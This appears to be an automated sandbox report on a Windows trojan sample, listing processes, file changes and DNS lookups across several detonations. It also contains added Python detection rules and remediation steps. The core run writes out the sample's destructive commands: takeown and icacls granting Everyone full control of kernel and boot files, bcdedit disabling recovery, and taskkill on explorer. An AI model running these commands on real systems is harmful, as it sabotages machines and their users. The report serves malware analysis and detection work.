File opened for modification C:\Program Files\WindowsApps\MID8A2~1.SCA\Assets\CONTRA~1\AppPackageLargeTile.scale-125_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI4B57~1.SCA\Assets\CalculatorAppList.contrast-black_scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI4C3B~1.SCA\Assets\VoiceRecorderAppList.contrast-black_scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\AppTiles\WEATHE~1\30x30\69.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB044~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\2494_48x48x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI101B~1.0_X\Assets\AppTiles\CONTRA~1\StoreAppList.targetsize-80.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\Flags\large\sg_60x42.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~2\OneNoteAppList.targetsize-256_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI354C~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE03D~1.0_X\Microsoft.Apps.Messaging.Base.winmd C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI79E2~1.0_X\Content\SURFAC~1\en-US\doc_offline_getconnected.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\1850_32x32x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI691C~1.0_X\Assets\FileExtension.targetsize-40.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\TEXTUR~1\denim.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\Workflow\Icon_Materials.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI41D1~1.0_X\Assets\complete.contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID550~1.SCA\Assets\SECOND~1\Home\SmallTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIAF54~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC949~1.SCA\Assets\GamesXboxHubLargeTile.scale-200_contrast-high.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\Autumn\autumn_13c.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~2\OneNoteAppList.targetsize-48_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI169C~1.SCA\Assets\CalculatorSplashScreen.contrast-black_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI9599~1.0_X\Assets\WINDOW~1\WindowsCameraSplashScreen.contrast-white_scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\6365_36x36x32.png C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe C:\Windows\system32\cmd.exe
PID 2908 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe C:\Windows\system32\cmd.exe
PID 2480 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2480 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2480 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 4340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 4340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2480 wrote to memory of 664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2480 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2480 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2480 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 2480 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 2480 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 2480 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\759D.tmp\759E.tmp\759F.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ntoskrnl.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\hal.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\hal.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ci.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ci.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\winload.efi"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\winload.efi" /grant everyone:F

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\WindowsApps"

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\WindowsApps" /grant everyone:F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\mspaint.exe

mspaint.exe

C:\Windows\system32\notepad.exe

notepad.exe

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
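
The process list above is the destructive core of this sample: the dropped 759F.bat seizes ownership of ntoskrnl.exe, hal.dll, ci.dll and winload.efi with takeown, grants Everyone full control with icacls, turns off Windows Recovery with bcdedit, does the same to the WindowsApps store directory (the "File opened for modification" rows above are cmd.exe touching its contents afterwards), and kills explorer.exe. Every step is a signed Windows binary, so the telemetry worth alerting on is the command line, not the image. The Python below is an added example, not part of this report or of the sample: a small rule set over process-creation records, with sample records constructed from the command lines listed above (the ParentImage and CommandLine field names imitate Sysmon Event ID 1 and are an assumption).

```python
"""Detection rules for the ownership, ACL and recovery tampering seen above.

Added example, not code from the sandbox or the sample. Records use the
Sysmon-style field names ParentImage/CommandLine (an assumption);
SAMPLE_EVENTS is constructed from the command lines in this report.
"""
from __future__ import annotations

import ntpath
import re
import shlex
from dataclasses import dataclass

# Boot-chain binaries whose owner and ACL never change outside servicing.
# The first four are the ones this sample touches; the rest are added here.
BOOT_CRITICAL = {"ntoskrnl.exe", "hal.dll", "ci.dll", "winload.efi",
                 "winload.exe", "winresume.efi", "winresume.exe", "bootmgfw.efi"}
PROTECTED_DIRS = (r"c:\windows\system32", r"c:\program files\windowsapps")
WORLD_PRINCIPALS = {"everyone", "*s-1-1-0", "users", "*s-1-5-32-545",
                    "authenticated users", "*s-1-5-11"}


@dataclass(frozen=True)
class Finding:
    tag: str        # ATT&CK technique ID where one clearly applies
    severity: str
    reason: str
    command: str


def split_cmdline(command_line: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in shlex.split(command_line, posix=False)]


def severity_of(path: str) -> str | None:
    """Rank how bad a change to this path's owner or ACL is."""
    p = path.lower()
    if ntpath.basename(p) in BOOT_CRITICAL:
        return "critical"
    if p.startswith(PROTECTED_DIRS):
        return "high"
    return None


def grants_full(perm: str) -> bool:
    """True when an icacls permission string amounts to Full control."""
    perm = re.sub(r"\((?:oi|ci|io|np|i)\)", "", perm.lower())  # drop inheritance flags
    rights = {r.strip() for r in perm.strip("()").split(",")}
    return bool(rights & {"f", "ga"})


def analyse(event: dict) -> list[Finding]:
    """Apply the rules to one process-creation record."""
    cmd = event["CommandLine"]
    argv = split_cmdline(cmd)
    if not argv:
        return []
    image = ntpath.basename(argv[0]).lower().removesuffix(".exe")
    args = argv[1:]
    low = [a.lower() for a in args]
    out: list[Finding] = []

    if image == "takeown":
        for i, a in enumerate(low):
            if a == "/f" and i + 1 < len(args) and (sev := severity_of(args[i + 1])):
                out.append(Finding("T1222.001", sev, f"ownership seized on {args[i + 1]}", cmd))

    elif image == "icacls" and args:
        target, sev = args[0], severity_of(args[0])
        start = next((i for i, a in enumerate(low) if a.startswith("/grant")), None)
        for g in (low[start + 1:] if start is not None else []):
            principal, _, perm = g.rpartition(":")
            if not principal or principal.startswith("/"):
                continue                      # another switch, not a grant
            if sev == "critical":             # any grant on a boot file is tampering
                out.append(Finding("T1222.001", sev, f"ACL changed on {target} ({g})", cmd))
            elif principal in WORLD_PRINCIPALS and grants_full(perm):
                out.append(Finding("T1222.001", sev or "medium",
                                   f"Full control granted to {principal} on {target}", cmd))

    elif image == "bcdedit":
        joined = " ".join(low)
        if "recoveryenabled no" in joined or "bootstatuspolicy ignoreallfailures" in joined:
            out.append(Finding("T1490", "critical", "Windows recovery disabled", cmd))

    elif image == "taskkill" and "/im" in low and "explorer.exe" in low:
        out.append(Finding("user-impact", "medium", "user shell (explorer.exe) killed", cmd))
    return out


def scan(events: list[dict]) -> list[Finding]:
    """Run every record through the rules, keeping telemetry order."""
    return [f for e in events for f in analyse(e)]


# Constructed from the process list in this report (a subset); the parent of
# each is the cmd.exe that runs the dropped 759F.bat.
SAMPLE_EVENTS = [
    {"ParentImage": "cmd.exe", "CommandLine": cl} for cl in (
        r'takeown /f "C:\Windows\System32\ntoskrnl.exe"',
        r'icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F',
        r'takeown /f "C:\Windows\System32\winload.efi"',
        r'icacls "C:\Windows\System32\winload.efi" /grant everyone:F',
        "bcdedit /set {default} recoveryenabled no",
        r'takeown /f "C:\Program Files\WindowsApps"',
        r'icacls "C:\Program Files\WindowsApps" /grant everyone:F',
        "taskkill /f /im explorer.exe",
        "notepad.exe",
    )
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.tag:10} {f.reason}")
```

On a live host the same findings are confirmed with icacls C:\Windows\System32\ntoskrnl.exe (a tampered file lists Everyone:(F)) and bcdedit /enum {default} (recoveryenabled No). Reversal is icacls <file> /remove:g Everyone, then icacls <file> /setowner "NT SERVICE\TrustedInstaller", and bcdedit /set {default} recoveryenabled yes; but because the batch makes the kernel and boot loader world-writable before anything else, treat those files as untrusted until sfc /scannow or a hash comparison against a known-good image clears them.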

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\759D.tmp\759E.tmp\759F.bat

MD5 fdc1bd905021633dfd77610ba86f7663
SHA1 101d7151ce4993d4f314ac2e837a9f9292846cb5
SHA256 439296ca854b289a4edb016c1ae4c37caeecd23bed10e512fc8b45c4259de9f8
SHA512 b6e6ec61cfae62c9e19e3882562e4f5ac0a53ade92d29e5cd5029e80b0a6462b09e7554493b50487cf7a18cabd823de297b8851b02677d5753eec9fee903653e

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

129s

Max time network

140s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\README.md

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\README.md

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\URDED.txt

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\URDED.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\info.txt

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\info.txt

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:17

Platform

win10-20240611-en

Max time kernel

84s

Max time network

90s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe"

Signatures

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4584 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe C:\Windows\system32\wscript.exe
PID 4584 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe C:\Windows\system32\wscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\E753.tmp\E754.tmp\E755.vbs //Nologo

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\E753.tmp\E754.tmp\E755.vbs

MD5 82455ed5816ace2c6842dc84cb620b37
SHA1 cade773fe4a7bc311a08829f3b38e08ae7c1415a
SHA256 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e
SHA512 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:31

Platform

win10-20240404-en

Max time kernel

41s

Max time network

109s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"

Signatures

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"

C:\Windows\system32\osk.exe

"C:\Windows\system32\osk.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2e0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{60A90A2F-858D-42AF-8929-82BE9D99E8A1}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8d25d9758,0x7ff8d25d9768,0x7ff8d25d9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1832 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2908 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2916 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4504 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4776 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Windows\system32\wininit.exe

"C:\Windows\system32\wininit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp

Files

memory/2496-8-0x00000213D6900000-0x00000213D6922000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcfqytit.vky.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2496-35-0x00000213D7040000-0x00000213D707C000-memory.dmp

memory/2496-46-0x00000213D7100000-0x00000213D7176000-memory.dmp

\??\pipe\crashpad_4972_WJFDMAANEBUCQDVY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

133s

Max time network

135s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

137s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 78.239.69.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

133s

Max time network

135s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\about.txt

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\about.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

135s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

